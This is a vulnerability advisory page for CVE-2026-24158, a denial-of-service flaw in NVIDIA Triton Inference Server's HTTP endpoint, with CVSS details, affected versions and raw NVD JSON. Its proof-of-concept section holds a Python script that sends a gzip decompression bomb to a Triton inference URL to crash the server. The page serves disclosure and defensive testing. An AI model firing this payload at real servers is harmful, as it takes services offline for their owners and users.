Security Vulnerability Report
CVE-2026-24158 CVSS 7.5 HIGH

CVE-2026-24158

Published: 2026-03-24 21:16:28
Last Modified: 2026-03-31 01:29:01

Description

NVIDIA Triton Inference Server contains a vulnerability in the HTTP endpoint where an attacker may cause a denial of service by providing a large compressed payload. A successful exploit of this vulnerability may lead to denial of service.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:triton_inference_server:*:*:*:*:*:*:*:* - VULNERABLE
NVIDIA Triton Inference Server (for the specific affected versions, refer to NVIDIA's official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import gzip
import requests

# Target URL (Replace with actual server address)
target_url = "http://target-triton-server:8000/v2/models/infer"

# Create a large payload (e.g., 100MB of 'A's)
# This simulates the decompressed bomb
original_size = 100 * 1024 * 1024
large_payload = b'A' * original_size

# Compress the payload to make it small enough for network transfer
compressed_payload = gzip.compress(large_payload)

print(f"Original size: {len(large_payload)}, Compressed size: {len(compressed_payload)}")

# Send the malicious request
headers = {
    "Content-Encoding": "gzip",
    "Content-Type": "application/json"
}

try:
    response = requests.post(target_url, data=compressed_payload, headers=headers)
    print(f"Status Code: {response.status_code}")
except Exception as e:
    print(f"Request failed (Server likely crashed): {e}")

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24158", "sourceIdentifier": "[email protected]", "published": "2026-03-24T21:16:27.997", "lastModified": "2026-03-31T01:29:00.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Triton Inference Server contains a vulnerability in the HTTP endpoint where an attacker may cause a denial of service by providing a large compressed payload. A successful exploit of this vulnerability may lead to denial of service."}, {"lang": "es", "value": "NVIDIA Triton Inference Server contiene una vulnerabilidad en el endpoint HTTP donde un atacante puede causar una denegación de servicio al proporcionar una carga útil comprimida grande. Un exploit exitoso de esta vulnerabilidad puede conducir a una denegación de servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:triton_inference_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.01", "matchCriteriaId": "A0D7A8AF-02D2-48AF-8F19-07020D3DA704"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24158", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5790", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": 
"https://www.cve.org/CVERecord?id=CVE-2026-24158", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}